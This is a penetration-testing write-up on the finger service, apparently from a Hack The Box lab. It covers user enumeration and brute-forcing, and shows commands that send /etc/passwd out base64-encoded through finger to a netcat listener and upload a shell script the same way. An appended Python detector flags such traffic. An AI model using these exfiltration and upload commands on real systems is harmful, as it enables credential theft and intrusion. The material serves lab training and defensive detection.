Pentesting Finger

Overview:

  • The finger daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.

PORT      STATE SERVICE   VERSION
79/tcp    open  finger    Sun Solaris fingerd
  • Finger is an exceedingly old protocol that is very rarely in use today.

  • Nmap results can show logged in users

| finger: Login       Name               TTY         Idle    When    Where\x0D
| sunny    sunny                 pts/1            Thu 14:52  10.10.14.245        \x0D

Check for logged in users

finger @10.10.10.76
No one logged on

Check for details on a user

finger jack@10.10.10.76
jack                  ???
#above user does not exist
finger root@10.10.10.76      
Login       Name               TTY         Idle    When    Where
root     Super-User            console      <Oct 14 10:28>
#user that does exist and is logged in 
finger ikeuser@10.10.10.76
Login       Name               TTY         Idle    When    Where
ikeuser  IKE Admin                          < .  .  .  . >
#user that does exist but is not logged in 

Bruteforce Users

If finger returns no logged in users, we can try to brute force usernames. We’ll use the finger-user-enum.pl script from pentestmonkey.

root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Thu Sep 27 17:39:02 2018 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..uucp     uucp Admin                         < .  .  .  . >..nuucp    uucp Admin                         < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..listen   Network Admin                      < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..jo                    ???..ann                   ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin         

Finger for file Transfers

While working on this post, I was checking out gtfobins, and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally:

root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5
[10.10.14.5]
root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd
listening on [any] 79 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768

root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
...[snip]...

You can upload files to a target machine as well:

root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79
root@sunday:~# finger x@10.10.14.5 > shell.b64
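
A defender-side view of the two techniques above (username brute forcing and base64 data carried in the finger query), as an added example that is not part of the original post: Python code that classifies the request bytes seen on port 79 and flags sources that look up many distinct names. The function names, thresholds and sample events are assumptions constructed for illustration.

```python
import base64, binascii, re
from collections import defaultdict

# Thresholds and patterns are assumptions for this example; tune per site.
LOGIN_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.-]{0,31}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
ENUM_THRESHOLD = 5   # distinct names from one source ...
ENUM_WINDOW = 60     # ... within this many seconds

def classify_query(raw: bytes) -> str:
    """Classify the request bytes a finger client sent to port 79."""
    text = raw.decode("latin-1").strip()
    if text.startswith("/W"):            # RFC 1288 verbose flag
        text = text[2:].strip()
    if not text:
        return "list-users"              # e.g. `finger @host`
    compact = "".join(text.split())      # base64(1) wraps its output
    if len(compact) >= 40 and len(compact) % 4 == 0 and B64_RE.match(compact):
        try:
            base64.b64decode(compact, validate=True)
            return "suspect-base64-payload"
        except binascii.Error:
            pass
    if all(LOGIN_RE.match(tok) for tok in text.split()):
        return "user-lookup"
    return "anomalous"

def find_enumerators(events):
    """events: (epoch_seconds, src_ip, raw_query) tuples; returns flagged sources."""
    recent, flagged = defaultdict(list), set()
    for ts, src, raw in sorted(events, key=lambda e: e[0]):
        if classify_query(raw) != "user-lookup":
            continue
        name = raw.decode("latin-1").strip()
        recent[src] = [(t, n) for t, n in recent[src] if ts - t <= ENUM_WINDOW]
        recent[src].append((ts, name))
        if len({n for _, n in recent[src]}) >= ENUM_THRESHOLD:
            flagged.add(src)
    return flagged

# Constructed sample traffic (not captured from a real host).
SAMPLE_EVENTS = [(1000 + i, "10.10.14.5", n.encode() + b"\r\n") for i, n in
                 enumerate(["access", "admin", "bin", "line", "root", "anne marie"])]
SAMPLE_EVENTS.append((2000, "192.0.2.10", b"root\r\n"))
SAMPLE_EXFIL = base64.encodebytes(b"root:x:0:0:Super-User:/root:/usr/bin/bash\n" * 3)

if __name__ == "__main__":
    print(classify_query(SAMPLE_EXFIL), find_enumerators(SAMPLE_EVENTS))
```

The same classifier applies to outbound connections to port 79, which is where the file-transfer use shows up on the sending host's network.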
